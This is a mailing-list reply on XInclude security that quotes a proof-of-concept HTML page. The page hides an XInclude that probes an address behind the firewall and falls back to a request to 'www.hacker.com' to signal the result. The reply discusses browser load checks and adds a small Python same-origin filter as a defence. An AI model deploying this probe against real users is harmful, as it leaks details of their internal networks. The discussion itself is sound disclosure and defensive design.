Elliotte Rusty Harold wrote:
> <html xmlns:xi="http://www.w3.org/2001/XInclude">
> <body>
> Here's what the user normally sees
> </body>
> <span style="display: none">
> <xi:include parse="text"
> href="http://www.behindthefirewall.com/someURL">
> <xi:fallback>
> <xi:include parse="text"
> href="http://www.hacker.com/?someURL=doesNotExist"/>
> </xi:fallback>
> </xi:include>
> </span>
> </html>
>
> Once a local user has loaded this into a web browser from behind the
> firewall, the original host site or some other remote site can easily
> determine whether some document exists on some server that would not
> normally be accessible to it. This scheme is not perfectly reliable.
> The biggest problem is that the attacker must have some good guesses
> as to likely local
[...]
> Partly this depends on browser security models. However, I suspect
> it's at least bad enough that browser vendors and other XInclude users
> should be made aware of the issues, and perhaps not XInclude by
> default; or perhaps it would be enough just not to fallback. Or
> perhaps not make the post-inclusion DOM available through scripting.
> Or limit the URLs included to ones from the same host as the base page
> came from. Thoughts?
Things like this are very common in the browser world, and are usually
noticed in time (you can find some "famous" examples where they were
not ;). Typically every resource load should go through a check that
determines whether the load is allowed, and XInclude-initiated resource
loads should be no different. (There are some exceptions to the
resource-load checks, like image loads, because historically they have
behaved that way, and changing implementations would break lots of sites
and severely limit the usefulness of these technologies. From a
privacy/security point of view they are still bugs, however. With new
specs we have a chance of making the implementations safe to begin with.)
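The per-load check described above could be as simple as comparing the
origin of the requested resource against the origin of the document that
triggered the load. A minimal sketch (the function name and the
same-scheme/same-host policy are illustrative assumptions, not any
browser's actual implementation):

```python
# Sketch of a same-origin gate for XInclude-initiated loads.
# Hypothetical policy: allow the fetch only if the include target
# shares the scheme and host of the including document.
from urllib.parse import urlparse

def load_allowed(document_url: str, include_href: str) -> bool:
    """Return True if an xi:include fetch of include_href should be
    permitted for a document loaded from document_url."""
    doc = urlparse(document_url)
    target = urlparse(include_href)
    return (target.scheme, target.hostname) == (doc.scheme, doc.hostname)

# The hostile page in the example above would be refused:
print(load_allowed("http://www.hacker.com/evil.html",
                   "http://www.behindthefirewall.com/someURL"))  # False
# An include from the page's own host would pass:
print(load_allowed("http://example.org/page.html",
                   "http://example.org/data.txt"))               # True
```

A real browser check would be stricter (port, redirects, scheme
downgrades), but even this simple gate blocks the cross-host probe in
the quoted example.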
From an implementor's point of view it would be great if the specs
themselves pointed out potential privacy/security issues. However, most
standards groups explicitly state that this is not their job, and it
would be a lot more work. Also, what is a privacy/security issue in one
context is not necessarily an issue in another; think of an
implementation on a server compared to one in a client, for example. If
the people working on a spec do not have varied needs and backgrounds,
they might be blind to problems in other contexts. Public comment
periods could help a lot, of course ("Please point out the parts of the
spec that could cause potential privacy or security issues.")
Privacy and security issues can easily be exposed by moving an
implementation from one context to another, such as moving an
intranet-only server-side component to a client that operates on the
public internet. If the spec specifically mentioned the potential
security holes in the technology, it would be easier to make this kind
of context switch as well; the security issues would just be more
explicit points to check before you declare standards compliance and
victory.
--
Heikki Toivonen